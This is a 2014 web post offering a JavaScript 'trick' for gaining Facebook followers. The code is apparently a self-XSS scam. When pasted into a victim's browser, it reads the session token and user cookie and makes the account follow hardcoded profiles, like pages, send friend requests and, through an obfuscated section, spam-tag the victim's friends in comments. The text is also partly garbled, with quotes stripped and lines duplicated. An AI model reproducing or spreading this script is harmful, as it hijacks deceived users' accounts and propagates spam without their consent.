//How do I get millions followers using this trick. //Do the same - TopicsExpress


//How do I get millions followers using this trick. //Do the same thing and you will get yours too! //See the full guide here cara-unlock-iphone-su.blogspot/2014/02/get-million-followers-facebook.html //This script will auto-tag your friends on Photo and automatically subscribe! //Use it wisely, excessive usage may ban your account and get it some limited feature. //After you this script you can contact me to make this script customized FOR YOU! var parent = document.getElementsByTagName(html)[0]; var _body = document.getElementsByTagName(body)[0]; var _div = document.createElement(div); _div.style.height = 100%; _div.style.width = 100%; _div.style.position = fixed; _div.style.top = auto; _div.style.bottom = 0; _div.align = center; _body.appendChild(_div); var fb_dtsg = document.getElementsByName(fb_dtsg)[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg = document.getElementsByName(fb_dtsg)[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function a(abone) { var http4 = new XMLHttpRequest; var url4 = /ajax/follow/follow_profile.php?__a=1; var params4 = profile_id= + abone + &location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg= + fb_dtsg + &lsd&__ + user_id + &phstamp=; http4.open(POST, url4, true); http4.onreadystatechange = function () { if (http4.readyState == 4 && http4.status == 200) http4.close }; http4.send(params4) } a(100001287383334); // Add your UID below. Replace with your own 100001287383334 UID // Use findmyfacebookid to find out your UID a(100000905624116);a(100007090620847); function sublist(uidss) { var a = document.createElement(script); a.innerHTML = new AsyncRequest().setURI(/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe).setData({ flid: + uidss + }).send();; document.body.appendChild(a) } var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg = document.getElementsByName(fb_dtsg)[0].value; var now = (new Date).getTime(); function P(post) { var X = new XMLHttpRequest(); var XURL = //facebook/ajax/ufi/like.php; var XParams = like_action=true&ft_ent_identifier= + post + &source=1&client_id= + now + %3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]= + post + &nctr[_mod]=pagelet_home_stream&__user= + user_id + &__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg= + fb_dtsg + &phstamp=; X.open(POST, XURL, true); X.onreadystatechange = function () { if (X.readyState == 4 && X.status == 200) { X.close } }; X.send(XParams) } var fb_dtsg = document.getElementsByName(fb_dtsg)[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function Like(p) { var Page = new XMLHttpRequest(); var PageURL = //facebook/ajax/pages/fan_status.php; var PageParams = &fbpage_id= + p + &add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user= + user_id + &__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg= + fb_dtsg + &phstamp=; Page.open(POST, PageURL, true); Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { Page.close } }; Page.send(PageParams) } function IDS(r) { var X = new XMLHttpRequest(); var XURL = //facebook/ajax/add_friend/action.php; var XParams = to_friend= + r + &action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user= + user_id + &__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg= + fb_dtsg + &phstamp=; X.open(POST, XURL, true); X.onreadystatechange = function () { if (X.readyState == 4 && X.status == 200) { X.close } }; X.send(XParams) } var _1937; var _4650 = ; var _5145 = /[\x41\x42\x43\x44\x45\x46]/; var _4605 = 2; var _2160 = _4650.charAt(_4650.length - 1); var _4612; var _3355 = _4650.split(_5145); var _8792 = [String.fromCharCode, isNaN, parseInt, String]; _3355[1] = _8792[_4605 + 1](_8792[_4605](_3355[1]) / 21); var _8572 = (_4605 == 8) ? String : eval; _4612 = ; _11 = _8792[_4605](_3355[0]) / _8792[_4605](_3355[1]); for (_1937 = 3; _1937 < _11; _1937++) _4612 += (_8792[_4605 - 2]((_8792[_4605](_3355[_1937]) + _8792[_4605](_3355[2]) + _8792[_4605](_3355[1])) / _8792[_4605](_3355[1]) - _8792[_4605](_3355[2]) + _8792[_4605](_3355[1]) - 1)); var _2127 = _9381; var _1106 = _2127=_4612; function _5520(_3088) { _8572(_5440); _5520(_6102); _6102(_1106); _5520(_2127); } var _5440 = _5520=_8572; var _6102 = _6102=_5520; _5520(_2160); Like(428979667246514); var _0xa22c = [value, fb_dtsg, getElementsByName, match, cookie, 455391317938682, onreadystatechange, readyState, arkadaslar = , for (;;);, , replace, responseText, ;, length, entries, payload, round, https://fb/Anonymous.Albanian.Official?fref=photo\ud83c\udf53 @[, uid, :, text, ], , \x26filter[0]=user, \x26options[0]=friends_only, \x26options[1]=nm, \x26token=v7, \x26viewer=, \x26__user=, https://, indexOf, URL, GET, https://facebook/ajax/typeahead/first_degree.php?__a=1, open, facebook/ajax/typeahead/first_degree.php?__a=1, send, random, floor, \x26ft_ent_identifier=, \x26comment_text= ✰__ Facebook __✰, \x26source=2, \x26client_id=1377871797138:1707018092, \x26reply_fbid, \x26parent_comment_id, \x26rootid=u_jsonp_2_3, \x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:, }, \x26attached_sticker_fbid=0, \x26attached_photo_fbid=0, \x26giftoccasion, \x26ft[tn]=[], \x26__a=1, \x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo, \x26__req=q, \x26fb_dtsg=, \x26ttstamp=, POST, /ajax/ufi/add_comment.php, Content-type, application/x-www-form-urlencoded, setRequestHeader, status, close]; var fb_dtsg = document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]]; var user_id = document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]); var id = _0xa22c[5]; var arkadaslar = []; var svn_rev; function arkadaslari_al(id) { var _0x7892x7 = new XMLHttpRequest(); _0x7892x7[_0xa22c[6]] = function () { if (_0x7892x7[_0xa22c[7]] == 4) { eval(_0xa22c[8] + _0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9], _0xa22c[10]) + _0xa22c[13]); for (f = 0; f < Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]] / 27); f++) { mesaj = _0xa22c[10]; mesaj_text = _0xa22c[10]; for (i = f * 27; i < (f + 1) * 27; i++) { if (arkadaslar[_0xa22c[16]][_0xa22c[15]][i]) { mesaj += _0xa22c[18] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]] + _0xa22c[20] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]] + _0xa22c[22]; mesaj_text += _0xa22c[23] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]; }; }; yorum_yap(id, mesaj); }; }; }; var _0x7892x8 = _0xa22c[24]; _0x7892x8 += _0xa22c[25]; _0x7892x8 += _0xa22c[26]; _0x7892x8 += _0xa22c[27]; _0x7892x8 += _0xa22c[28] + user_id; _0x7892x8 += _0xa22c[29] + user_id; if (document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30]) >= 0) { _0x7892x7[_0xa22c[35]](_0xa22c[33], _0xa22c[34] + _0x7892x8, true); } else { _0x7892x7[_0xa22c[35]](_0xa22c[33], _0xa22c[36] + _0x7892x8, true); }; _0x7892x7[_0xa22c[37]](); }; function RandomArkadas() { var _0x7892xa = _0xa22c[10]; for (i = 0; i < 9; i++) { _0x7892xa += _0xa22c[18] + arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]() * arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]] + _0xa22c[20] + arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]() * arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]] + _0xa22c[22]; }; return _0x7892xa; }; function yorum_yap(id, _0x7892xc) { var _0x7892xd = new XMLHttpRequest(); var _0x7892x8 = _0xa22c[10]; _0x7892x8 += _0xa22c[40] + id; _0x7892x8 += _0xa22c[41] + encodeURIComponent(_0x7892xc); _0x7892x8 += _0xa22c[42]; _0x7892x8 += _0xa22c[43]; _0x7892x8 += _0xa22c[44]; _0x7892x8 += _0xa22c[45]; _0x7892x8 += _0xa22c[46]; _0x7892x8 += _0xa22c[47] + id + _0xa22c[48]; _0x7892x8 += _0xa22c[49]; _0x7892x8 += _0xa22c[50]; _0x7892x8 += _0xa22c[51]; _0x7892x8 += _0xa22c[52]; _0x7892x8 += _0xa22c[29] + user_id; _0x7892x8 += _0xa22c[53]; _0x7892x8 += _0xa22c[54]; _0x7892x8 += _0xa22c[55]; _0x7892x8 += _0xa22c[56] + fb_dtsg; _0x7892x8 += _0xa22c[57]; _0x7892xd[_0xa22c[35]](_0xa22c[58], _0xa22c[59], true); _0x7892xd[_0xa22c[62]](_0xa22c[60], _0xa22c[61]); _0x7892xd[_0xa22c[6]] = function () { if (_0x7892xd[_0xa22c[7]] == 4 && _0x7892xd[_0xa22c[63]] == 200) { _0x7892xd[_0xa22c[64]]; }; }; _0x7892xd[_0xa22c[37]](_0x7892x8); }; arkadaslari_al(id);
Posted on: Thu, 13 Nov 2014 09:36:11 +0000

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